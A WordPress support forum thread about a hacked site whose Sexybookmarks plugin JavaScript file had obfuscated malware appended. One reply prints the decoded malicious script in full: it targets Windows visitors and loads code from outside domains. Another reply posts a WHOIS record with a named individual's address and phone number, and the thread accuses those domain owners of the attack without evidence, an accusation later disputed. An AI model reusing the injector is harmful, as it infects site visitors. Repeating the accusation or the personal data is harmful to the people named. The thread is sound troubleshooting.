WordPress.org

Ready to get started?Download WordPress

Forums

Shareaholic | share buttons & related posts
[resolved] sexybookmarks seen as malware? (8 posts)

  1. mutedgirl
    Member
    Posted 4 years ago #

    So something very strange. Several people contacted me, saying that my blog was giving them malware warnings. I did the usual routine- checked my theme files, ran the Exploit scanner plugin, checked the site myself (no message or warning for me) and nothing was out of the ordinary. The other weird thing is that some people said they only got the message some of the time- other times, it was fine.

    I had a visitor take a screenshot of what she was seeing.

    click to view screenshot

    As you can see, it lists sexybookmarks.js as the culprit. HUH? I checked the plugin files and nothing has been modified (and I've been using this plugin for months now with no issues) I deactivated the plugin and had her check again and she no longer gets the warning.

    So! My question: is anyone else noticing this behavior?? It's possible that it's just something unique to different virus monitoring software (which would explain why some people see the warning, others don't) I did some Google searching but this doesn't seem to be a widespread thing... very very curious!

  2. Masherwp
    Member
    Posted 4 years ago #

    Thats very worrying and a method used by some unscrupulous coders to serve spam server side. I'm not saying this is the intention of this particular plugin but having upgraded i have encountered a few issues with WP 3 and seriously thinking of going back a version and ripping out the admin call back so I dont get the upgrade notices which to be honest I'm always trying to find any worthwhile difference afterwards.

  3. Josh Jones
    Member
    Posted 4 years ago #

    @mutedgirl:

    Indeed very curious. I can assure you that the plugin contains absolutely NO malware, spam, or anything else even remotely dangerous in it's initial packaging...

    However, after taking a look at your file... It does seem that you've been hacked. Take a look at the following file:
    http://jayesel.net/wp-content/plugins/sexybookmarks/js/sexy-bookmarks-public.js

    You'll notice the long string of garbled JS at the beginning, followed by the normal JS which comes with the plugin. It looks as though someone has hacked your server and appended some JS to your public javascript file included with SB.

    You can download the plugin again directly from wp.org and you'll notice that the JS file does not include what you have in your JS file.

  4. mutedgirl
    Member
    Posted 4 years ago #

    I actually found a similar hack in another plugin as well (multiple column blogroll widget) That one was causing only some people to get the error, I think, because it displays links at random, 10 or so at a time (so only some of the time was the offending code being used/displayed) I removed that as well and so far, things seem quiet.

    I'm glad it's not the actual plugin for sexybookmarks, because I really like that one :) I've changed passwords etc and I'm going to see if things stay clean, then start adding back in the stuff I removed while testing.

    Thanks for your response! This malware stuff is ridiculous!

  5. Josh Jones
    Member
    Posted 4 years ago #

    I agree, malware and spam is getting to be even more of a ridiculous nuisance now than it ever has been.

    Also, just for your info... The garbled script that someone put into the public js file for sexybookmarks decoded into the following:

    <script type="text/javascript">var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("watchtime")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["edisonsnightclub.com","gaindirectory.org","ideacoreportal.com","karenegren.com"],e=["aqua.","azure.","black.","blue.","brown.","chocolate.","coral.","cyan.","darkred.","fuchsia.","gold.","gray.","green.","indigo.","ivory.","khaki.","lime.","magenta.","maroon.","navy.","olive.","orange.","pink.","plum.","purple.","red.","silver.","snow.","violet.","white.","yellow."],f=Math.floor(Math.random()* d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="watchtime="+escape("watchtime")+";expires="+dt.toGMTString()+";path=/";document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/data/mootools.js"><\/script>')};</script>

    So I'm assuming the owners of:

    edisonsnightclub.com,
    gaindirectory.org,
    ideacoreportal.com,
    and
    karenegren.com

    are the perpetrators behind it.

  6. sahaskatta
    Member
    Posted 4 years ago #

    Registrant:
       IDEACore LLC
       22552 King Richard Ct.
       Beverly Hills, Michigan 48025
       United States
    
       Domain Name: IDEACOREPORTAL.COM
          Created on: 14-Jan-05
          Expires on: 14-Jan-11
          Last Updated on: 15-Jan-10
    
       Administrative Contact:
          Craig, Joseph
          IDEACore LLC
          22552 King Richard Ct.
          Beverly Hills, Michigan 48025
          United States
          2484333380      Fax -- 
    
       Technical Contact:
          Craig, Joseph
          IDEACore LLC
          22552 King Richard Ct.
          Beverly Hills, Michigan 48025
          United States
          2484333380      Fax -- 
    
       Domain servers in listed order:
          NS51.DOMAINCONTROL.COM
          NS52.DOMAINCONTROL.COM
  7. simka
    Member
    Posted 4 years ago #

    These assumptions are all wrong, it's an acknowledged hack of servers that were not in the possession or control of the people or entities you list above. The owners of the domains are definitely not the "perpetrators" as per Josh, nor was it likely that the originating poster was.

    The Phoenix Exploit in kit has been implicated in issues in the realm of these posts.

    It's not a good idea or fair to publish the data above when you're not certain about the facts, as erroneous information defames the parties.

    Someone attempted to maliciously point those domains to a hacked server, but the domains and contacts you list were surely not complicit. This could even be a registrar breach.

    The domains don't show any involvement with this attack and are clean.

    Sahaskatta and Josh Jones, to be most accurate and fair, you should remove these errant publications of opinions/assumptions about the domains and registrants.

  8. Josh Jones
    Member
    Posted 4 years ago #

    @simka:

    As I mentioned above, that was only an assumption. I'm not a hacker, nor do I know much about hacking at all... I simply made an assumption based on the facts I saw, which was that those domains were being flaunted in the hack.

    At any rate, it's been far too long since this post was created so I can't edit/remove my response.

Topic Closed

This topic has been closed to new replies.

About this Plugin

About this Topic